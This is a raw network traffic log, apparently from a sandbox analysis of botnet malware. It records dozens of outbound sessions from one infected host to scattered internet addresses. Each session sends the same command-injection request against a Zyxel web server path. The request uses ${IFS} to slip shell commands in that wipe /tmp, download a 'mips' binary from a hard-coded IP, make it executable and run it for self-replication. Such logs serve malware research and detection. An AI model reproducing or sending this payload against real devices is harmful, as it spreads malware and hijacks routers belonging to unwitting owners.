                              Mar 31, 2024 08:41:24.801037073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3850192.168.2.1342210221.31.248.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801069975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3851192.168.2.1343192210.96.6.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801095963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3852192.168.2.1358300112.57.198.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801132917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3853192.168.2.1332924101.133.200.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801165104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3854192.168.2.1344284142.19.194.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801214933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3855192.168.2.133827086.178.95.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801239967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3856192.168.2.1334358175.48.252.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801276922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3857192.168.2.135575213.95.3.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801321030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3858192.168.2.135804872.131.128.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801371098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3859192.168.2.1357674174.235.175.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801405907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3860192.168.2.1352224140.42.210.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801440001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3861192.168.2.1357228212.129.196.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801474094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3862192.168.2.1348630168.112.240.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801497936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3863192.168.2.1354686163.189.101.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801537037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3864192.168.2.135457084.38.151.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801567078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3865192.168.2.136089068.183.150.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801598072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3866192.168.2.133793445.143.154.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801645041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3867192.168.2.1358184104.177.3.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801676035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3868192.168.2.1336488222.236.223.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801709890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3869192.168.2.133323483.53.202.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801757097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3870192.168.2.135795483.58.78.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801776886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3871192.168.2.1350072165.114.75.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801806927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3872192.168.2.1348870184.53.184.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801829100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3873192.168.2.1335258115.177.76.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801846981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3874192.168.2.1334848137.255.30.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801907063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3875192.168.2.133840264.249.170.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801944017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3876192.168.2.1360754158.86.222.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.801953077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3877192.168.2.1333608132.110.21.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802000046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3878192.168.2.133758669.239.20.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802017927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3879192.168.2.1338326145.36.186.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802053928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3880192.168.2.134540643.156.6.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802097082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3881192.168.2.133715469.215.139.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802114010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3882192.168.2.133738451.211.72.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802160025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3883192.168.2.134834650.54.48.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802187920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3884192.168.2.1339178195.228.93.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802226067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3885192.168.2.135424481.61.89.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802293062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3886192.168.2.1354228207.73.87.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802311897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3887192.168.2.135589477.88.85.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802370071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3888192.168.2.135569275.197.194.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802391052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3889192.168.2.1334626217.82.14.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802423000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3890192.168.2.135012469.124.247.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802454948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3891192.168.2.135802294.76.20.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802480936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3892192.168.2.135818871.213.219.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802535057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3893192.168.2.1349944103.203.242.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802550077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3894192.168.2.134252476.234.173.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802568913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3895192.168.2.133294612.129.5.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802607059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3896192.168.2.1338114182.229.114.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802649975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3897192.168.2.135090685.125.101.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802681923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3898192.168.2.1342264100.159.231.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802748919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3899192.168.2.1348856100.36.2.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802782059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3900192.168.2.1347358141.230.65.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802835941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3901192.168.2.1360444128.32.218.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802835941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3902192.168.2.1335890146.16.245.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802848101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3903192.168.2.1332864100.57.72.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802871943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3904192.168.2.1345826121.227.190.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802921057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3905192.168.2.1343716141.168.254.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802968025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3906192.168.2.1356022133.8.133.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.802994967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3907192.168.2.1341758194.231.200.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803026915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3908192.168.2.134099659.35.47.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803040981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3909192.168.2.1340548117.14.130.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803095102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3910192.168.2.13462121.242.22.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803106070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3911192.168.2.133726491.126.79.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803164005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3912192.168.2.136078075.213.153.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803174973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3913192.168.2.1350708141.117.64.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803220034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3914192.168.2.1340198207.229.21.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803251028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3915192.168.2.133565089.114.19.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803292036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3916192.168.2.1355478168.121.55.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803318977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3917192.168.2.1347532209.221.244.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803347111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3918192.168.2.1345844166.137.47.87443
                              TimestampBytes transferredDirectionData
